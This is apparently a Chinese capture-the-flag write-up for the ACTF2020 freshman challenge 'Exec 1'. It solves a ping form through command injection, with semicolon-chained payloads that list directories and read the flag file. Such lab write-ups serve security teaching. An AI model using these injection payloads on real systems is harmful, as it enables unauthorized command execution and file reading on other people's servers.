打开环境
[ACTF2020 新生赛]Exec 1(Linux/远程命令执行)
又是一个ping的题,猜测远程命令执行。
payload:ping 127.0.0.1;ls
[ACTF2020 新生赛]Exec 1(Linux/远程命令执行)
直接显示了index.php,要知道Linux系统显示网页的路径是/var/www/html
也就是说index.php在这个路径里
而且;分号又没有过滤
先返回根目录看看flag在不在:127.0.0.1;cd /;ls
[ACTF2020 新生赛]Exec 1(Linux/远程命令执行)
还真在,而且空格,分号都没过滤。
最后的payload:127.0.0.1;cd /;cat flag
[ACTF2020 新生赛]Exec 1(Linux/远程命令执行)
得到flag

相关文章:

  • 2021-07-21
  • 2021-12-26
  • 2022-12-23
  • 2022-12-23
  • 2021-12-23
  • 2022-12-23
  • 2021-08-01
猜你喜欢
  • 2021-08-26
  • 2021-07-10
  • 2022-12-23
  • 2022-12-23
  • 2021-11-30
  • 2021-04-03
相关资源
相似解决方案